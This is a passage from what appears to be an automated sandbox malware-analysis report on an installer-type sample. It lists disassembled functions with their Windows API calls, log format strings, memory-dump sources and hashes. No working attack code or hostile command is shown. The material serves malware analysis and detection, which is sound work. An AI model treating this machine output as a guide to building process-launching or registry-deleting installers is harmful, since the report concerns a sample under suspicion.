                                                                                        • Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D
                                                                                        Function 00404F72 Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                        • lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                        • lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
                                                                                        • SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                        • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                          • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                        • String ID:
                                                                                        • API String ID: 2740478559-0
                                                                                        • Opcode ID: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                                                                        • Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
                                                                                        • Opcode Fuzzy Hash: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                                                                        • Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98
                                                                                        Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                          • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
                                                                                          • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                          • Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                                                          • Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71
                                                                                        • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                        • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                        Strings
                                                                                        • Exec: success ("%s"), xrefs: 00402263
                                                                                        • Exec: command="%s", xrefs: 00402241
                                                                                        • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                        • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                        • API String ID: 2014279497-3433828417
                                                                                        • Opcode ID: 04fd410bbb31de0d7d21d8cf733f8caec58fdd5b228a354368cf1c704b35d166
                                                                                        • Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
                                                                                        • Opcode Fuzzy Hash: 04fd410bbb31de0d7d21d8cf733f8caec58fdd5b228a354368cf1c704b35d166
                                                                                        • Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D
                                                                                        Function 0040484E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
                                                                                        • GetMessagePos.USER32 ref: 00404871
                                                                                        • ScreenToClient.USER32(?,?), ref: 00404889
                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
                                                                                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message$Send$ClientScreen
                                                                                        • String ID: f
                                                                                        • API String ID: 41195575-1993550816
                                                                                        • Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                                                        • Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
                                                                                        • Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                                                        • Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5
                                                                                        Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                        • MulDiv.KERNEL32(0001B800,00000064,?), ref: 00403295
                                                                                        • wsprintfW.USER32 ref: 004032A5
                                                                                        • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                        • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                        Strings
                                                                                        • verifying installer: %d%%, xrefs: 0040329F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Text$ItemTimerWindowwsprintf
                                                                                        • String ID: verifying installer: %d%%
                                                                                        • API String ID: 1451636040-82062127
                                                                                        • Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                                                        • Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
                                                                                        • Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                                                        • Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58
                                                                                        Function 004043AD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 73stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
                                                                                        • wsprintfW.USER32 ref: 00404457
                                                                                        • SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: ItemTextlstrlenwsprintf
                                                                                        • String ID: %u.%u%s%s$@rD
                                                                                        • API String ID: 3540041739-1813061909
                                                                                        • Opcode ID: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                                                                        • Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
                                                                                        • Opcode Fuzzy Hash: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                                                                        • Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679
                                                                                        Function 00406038 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                                        • CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                                        • CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                                        • CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Char$Next$Prev
                                                                                        • String ID: *?|<>/":
                                                                                        • API String ID: 589700163-165019052
                                                                                        • Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                                                        • Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
                                                                                        • Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                                                        • Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD
                                                                                        Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                        • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Close$DeleteEnumOpen
                                                                                        • String ID:
                                                                                        • API String ID: 1912718029-0
                                                                                        • Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                                                        • Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
                                                                                        • Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                                                        • Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29
                                                                                        Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?), ref: 004020A3
                                                                                        • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                        • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                        • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                        • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                        • String ID:
                                                                                        • API String ID: 1849352358-0
                                                                                        • Opcode ID: 3f37f65ad39e50193b5eb5465f4a6a1b76990ca473236759665c0c01a91169be
                                                                                        • Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
                                                                                        • Opcode Fuzzy Hash: 3f37f65ad39e50193b5eb5465f4a6a1b76990ca473236759665c0c01a91169be
                                                                                        • Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28
                                                                                        Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                        • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Timeout
                                                                                        • String ID: !
                                                                                        • API String ID: 1777923405-2657877971
                                                                                        • Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                                                        • Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
                                                                                        • Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                                                        • Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758
                                                                                        Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                        • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                        Strings
                                                                                        • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                        • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                        • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                        • API String ID: 1697273262-1764544995
                                                                                        • Opcode ID: 48bae300e43d63654b7fe916574e47b7d5bb67918eda10473d167f607cc9ee43
                                                                                        • Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
                                                                                        • Opcode Fuzzy Hash: 48bae300e43d63654b7fe916574e47b7d5bb67918eda10473d167f607cc9ee43
                                                                                        • Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D
                                                                                        Function 004048CC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • IsWindowVisible.USER32(?), ref: 00404902
                                                                                        • CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970
                                                                                          • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$CallMessageProcSendVisible
                                                                                        • String ID: $@rD
                                                                                        • API String ID: 3748168415-881980237
                                                                                        • Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                                                        • Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
                                                                                        • Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                                                        • Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD
                                                                                        Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                          • Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                                          • Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC
                                                                                        • lstrlenW.KERNEL32 ref: 004026B4
                                                                                        • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                        • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                        • String ID: CopyFiles "%s"->"%s"
                                                                                        • API String ID: 2577523808-3778932970
                                                                                        • Opcode ID: f84dc7438b734d649018535b99f5ff883fadf72990f7ea17a428efaae3f8c2d6
                                                                                        • Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
                                                                                        • Opcode Fuzzy Hash: f84dc7438b734d649018535b99f5ff883fadf72990f7ea17a428efaae3f8c2d6
                                                                                        • Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59
                                                                                        Function 00406224 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
